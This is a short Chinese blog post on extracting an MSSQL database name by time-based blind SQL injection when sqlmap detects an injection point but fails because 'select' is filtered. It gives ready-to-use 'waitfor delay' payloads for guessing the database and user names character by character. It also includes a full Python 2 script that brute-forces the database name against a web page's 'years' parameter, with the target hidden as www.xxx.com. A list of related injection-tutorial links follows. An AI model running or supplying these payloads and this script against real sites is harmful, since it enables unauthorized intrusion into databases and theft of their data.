【实战分享】sqlmap显示有注入却无法爆出库名
2018-08-23 15:48
1126 查看
sqlmap爆mssql数据库时采用的语句如下图:
从语句中不难看出,如果关键字select被“(非tamper绕过)处理”了,那sqlmap是无法爆出数据库的,这时我们可以使用原始的猜解法,
#判断数据库和用户名长度
'+if(len(db_name())=%s)+waitfor+delay+'0:0:5'--
'+if(len(user_name())=%s)+waitfor+delay+'0:0:5'--
#循环注出数据库和用户名
'+if(ascii(substring(db_name(),%s,1))=%s)+waitfor+delay+'0:0:5'--
'+if(ascii(substring(user_name(),%s,1))=%s)+waitfor+delay+'0:0:5'--
分享一个最近用的时间延迟盲注爆库名脚本(手工测下库名长度):
import urllib import urllib2 import time payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.' header = { 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' } values={} print 'Start to retrive database:' user= '' for i in range(1, 20): for payload in payloads: startTime=time.time() try: values['action']='getvideo' values['pc_mob']='GP' values['years']="' if(ascii(substring(db_name(),%s,1))=%s) waitfor delay '0:0:5'--" % (str(i),ord(payload)) data = urllib.urlencode(values) url = "http://www.xxx.com/operation.aspx" geturl = url+'?'+data request = urllib2.Request(geturl,headers=header) response = urllib2.urlopen(request) if time.time()-startTime>5: user+=payload print 'the database is:'+user break else: print 'dumping database...' except Exception,e: print e
相关文章推荐
- Extjs 实战之 Ext.tree.TreePanel Tree无法显示
- QQ,微博,微信链接分享无法显示分享记录
- IIS 浏览aspx页面出现无法显示XML页的解决方法分享
- IIS 浏览aspx页面出现无法显示XML页的解决方法分享
- 【无私分享:ASP.NET CORE 项目实战(第二章)】添加EF上下文对象,添加接口、实现类以及无处不在的依赖注入(DI)
- 【无私分享:ASP.NET CORE 项目实战(第二章)】添加EF上下文对象,添加接口、实现类以及无处不在的依赖注入(DI)
- windows 显示smb分享成功,其他电脑却无法读取该分享原因
- 再谈联合查询注入字段间编码不同无法显示内容问题
- SQLmap注入学习实战 —— dvwa 从low到impossble
- sqlmap之(四)----Mysql注入实战
- sqlmap之(六)----POST登陆框注入实战
- [实例] 简单搞定联合查询注入字段间编码不同无法显示内容问题
- SQLmap注入学习实战 —— 宽字节注入与sqlmap进阶玩法
- android分享网络图片到微信,QQ无法显示
- 微信分享缩略图无法显示的解决办法
- DVWA+SQLmap+Mysql注入实战
- ie8浏览器 图片本身问题导致 无法显示图片--- 诡异现象的排查分享
- 经验分享:为什么制图无法显示数据
- (项目)首页面进不去,报错显示无法创建controller,并显示无法注入service
- sqlmap之(五)----Cookie注入实战